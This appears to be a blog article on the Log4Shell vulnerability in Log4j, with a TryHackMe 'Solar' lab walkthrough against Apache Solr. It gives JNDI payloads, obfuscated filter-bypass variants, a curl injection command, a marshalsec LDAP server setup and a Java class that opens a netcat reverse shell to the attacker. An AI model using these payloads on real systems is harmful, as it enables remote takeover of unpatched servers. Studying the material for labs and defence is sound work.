Log4j RCE CVE-2021–44228
On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021–44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed "Log4Shell".Hence i decided to write an article about this vulnerability and do a lab about it.
What is Log4j? Log4j is an open-source logging software widely used to log information. Log4j is used by approximately 3 billion devices running Java, including web servers, mobile devices, and even smart devices such as fridges.
Language?log4j is a reliable, fast and flexible logging framework (APIs) written in Java, which is distributed under the Apache Software License. log4j is a popular logging package written in Java. log4j has been ported to the C, C++, C#, Perl, Python, Ruby, and Eiffel languages.
Need to learn more about log4j?kindly check: https://www.tutorialspoint.com/log4j/log4j_overview.htm
Affected? Apache Log4j between versions log4j 2.0 to 2.14.1 are vulnerable to unauthenticated arbitrary code execution. A remote attacker can exploit the vulnerability to run malicious code on the affected machine.
How?The vulnerability resides in the Java Naming and Directory Interface (JNDI) implementation component of the Lightweight Directory Access Protocol (LDAP) connector and can be triggered using an LDAP request. It allows an attacker to retrieve a payload from a remote server and execute it locally.
To exploit the vulnerability, an attacker sends a request that contains malicious payload to the application. The crafted payload looks like in the following request;
${jndi: ldap://attacker_controlled_website/payload_to_be_executed}
Upon receiving the attacker’s payload, the vulnerable Log4j will interpret the input contained in the payload as a JNDI resource and make a request to the attacker’s controlled server to retrieve the requested resource. The attacker can send back a remote Java class file, which will then be loaded by the vulnerable application.
Impact: Successful exploitation of this vulnerability may allow an attacker to take control of the affected systems.
Where To test?: locations you might supply this JNDI syntax in url where parameter is passed, Input boxes, user and password login forms, data entry points within applications, HTTP headers such as User-Agent, X-Forwarded-For, or other customizable headers and any place for user-supplied data.
Bypass: Some bypasses are like this
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}
You can check others:
Solution: Apache has issued updates to fix vulnerable versions of Log4j. Users and Administrators are encouraged to apply necessary updates.Where appropriate, please ensure you patch the logging-log4j package to version 2.16.0 or higher (as new releases come available). In version 2.16.0 , JNDI is fully disabled, support for Message Lookups is removed, and the new DoS vulnerability CVE-2021-45046 is not present.
LAB: Solar, exploiting log4j at tryhackme
Enumeration: I won’t go deep to enumeration so my aim is just to know a which port run a website and if that website has technology that use java so we can test for log4j
Simple nmap scan below
port 8983 seems weird so scan for it is necessary
nmap show that it is Apache Solr. We can google a little bit about it to understand it before we proceed. From wikipedia , we learn that is run on java based on the Apache Lucene library.
Explore the website to find where you can test jndi syntaxt.Then you can test it to find if it is calling back to your machine.
How to test?
Your machine(Attacker): Open a port where you can look if we have a callback from vulnerable machine by nc -nvlp 9999
Web interface: Where you test if you have log4shell or not. I will use curl command as vulnerability exist in url parameter. As you can see from below that once i make curl request and other side i was able to get callback from vulnerable machine
curl ‘http://10.10.207.185:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.205.131:9999\}'
Then our site is vulnerable to log4shell. The question is that how can we obtain a remote code execution? 🤔💡
Setting enviroments:
First make sure your system has java installed about Java 1.8.0_181. Second you need to git clone github directory git clone https://github.com/mbechler/marshalsec then cd marshalsec then sudo apt install maven then mvn clean package -DskipTests (build packages).
Exploitation:
Start LDAP Server: by
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"
Create java program with choice of editor and save it as Exploit.java.
public class Exploit { static { try { java.lang.Runtime.getRuntime().exec(“nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9998”); } catch (Exception e) { e.printStackTrace(); } } }
Save it in marshalsec folder. Compile it as javac Exploit.java.then in that marshalsec host webserver with same port number as in the one listen for ldap like 8000
python3 -m http.server 8000
then listen port 9998 as port number you put in Exploit.java so as to get shell once ldap make request to web with file Exploit.
After all setup, now you can request a web interface that lndi request
POC:
First: Malicious code pass to url parameter
Second: jndi make request to ldap then ldap request execution of java class in web interface
Third: Exploit was taken in port 8000 we create as you can see it
Fourth: then we have shell as you can see 😊😊😊
Thanks for reading my articles.
Lab:
References:
